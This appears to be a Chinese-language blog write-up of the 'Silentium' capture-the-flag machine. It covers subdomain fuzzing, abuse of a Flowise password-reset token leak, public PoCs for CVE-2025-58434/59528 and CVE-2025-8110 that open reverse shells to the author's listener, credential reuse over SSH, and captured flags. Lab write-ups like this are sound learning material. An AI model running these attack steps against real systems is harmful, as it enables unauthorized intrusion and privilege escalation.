Silentium

USER FLAG

nmap 扫一下靶机的端口服务

1
nmap -A 10.129.94.71

22 的 SSH 服务,还有 80 的 HTTP

image-20260414154524722

先看 80 的,无法重定向,设置一下/etc/hosts

1
10.129.94.71 silentium.htb

image-20260414154647604

浏览器可以成功访问到

image-20260414154720542

用 dirsearch 扫目录没扫到有用东西

利用 fuff 工具扫子域名

1
ffuf -u http://silentium.htb -H "Host: FUZZ.silentium.htb"  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -ac

可以扫到staging.silentium.htb

image-20260414185340993

配置一下/etc/hosts

1
10.129.94.71 silentium.htb staging.silentium.htb

image-20260414185441613

然后就可以访问到了

image-20260414185518405

http://silentium.htb/#team可以看到有个 Ben 用户名

image-20260414191306835

随便输入个admin@silentium.htb,回显的是 404(邮箱后缀就是靠猜呗)

image-20260414191516887

输入ben@silentium.htb,回显的是 401

image-20260414191543752

这说明是存在这个用户的,只是密码不对而已

不过这有个忘记密码的功能

image-20260414191723568

image-20260414191732000

输入邮箱ben@silentium.htb,发包可以得到 tempToken:CRQa3U0jTP6msNDmUocNmvOIcnOpBwKUD7ecSVfDPNHrSq0a7HMLEN3NoDQidiHN

image-20260414192111410

这里还有个改密码的地方

image-20260414191904853

在这里输入 tempToken 就能改密码了

image-20260414191937247

image-20260414192138163

成功登录

image-20260414192234614

可以看出这是 Flowise,还有可以在/api/v1/version看到当前的版本是 3.0.5

image-20260414192546722

去找一下对应版本的历史漏洞和POC:CVE-2025-58434 + CVE-2025-59528

POC:https://github.com/AzureADTrent/CVE-2025-58434-59528

1
python CVE-2025-58434-59528.py -t http://staging.silentium.htb/ -e ben@silentium.htb

image-20260414193514991

可以看到登录后能在http://staging.silentium.htb/apikey获取到 apikey

image-20260414193615254

1
hWp_8jB76zi0VtKSr2d9TfGK1fm6NuNPg1uA-8FsUJc

直接复制到终端即可,然后让输入地址,这里是反弹shell的地址,就输入 kali 分配到的 IP:10.10.16.23

image-20260414193715736

然后是端口 4444

image-20260414194001076

这里让准备好监听

1
nc -lvnp 4444

image-20260414194039107

最后监听好后回车即可,成功反弹shell

image-20260414194127987

直接就是 root 用户

image-20260414194202291

不过是在 docker 容器中

image-20260414194333001

env 环境变量可以查看到密码:r04D!!_R4ge

image-20260414194750382

尝试 22 端口登录 ben 用户

1
ssh ben@10.129.94.71

成功登录

image-20260414194853801

得到 user flag

image-20260414194919527

1
87fb855784ab2358de352152bbac0a13

ROOT FLAG

尝试提权,SUID 和 SUDO 都没有,查看网络服务

1
netstat -tulpn

有个 3001 端口

image-20260414195322555

端口转发带出来

1
ssh -L 3001:127.0.0.1:3001 ben@10.129.94.71

image-20260414195944827

本地访问http://127.0.0.1:3001/

image-20260414195914576

是 Gogs 服务,找历史漏洞和POC

可以找到:CVE-2025-8110

image-20260414200207072

到最新版还没修复(不过文章是25年的了)

image-20260414200238260

POC:https://github.com/Ghxstsec/CVE-2025-8110

脚本里的 username 和 token 要改一下

image-20260414201301564

要先注册一个用户,我注册的是 test 用户,密码是 Admin@123

image-20260414201345049

注册好后登录进去,token可以在 “用户设置” 中

image-20260414201639803

“授权应用” 里生成

image-20260414201754492

image-20260414201803850

1
85e8c255e81f47a4d7f9d564e1ea3caeb2e3b017

然后修改一下脚本即可

image-20260414201849189

运行命令,这里的 IP 和 端口是反弹shell的

1
python3 CVE-2025-8110.py -u http://127.0.0.1:3001 -lh 10.10.16.23 -lp 2333 -p 'Admin@123'

image-20260414202106184

成功提权

image-20260414202128334

image-20260414202144843

1
0d1fb76f70f6621ae43c3920deddab76

Silentium
https://yschen20.github.io/2026/04/14/Silentium/
作者
Suzen
发布于
2026年4月14日
更新于
2026年4月14日
许可协议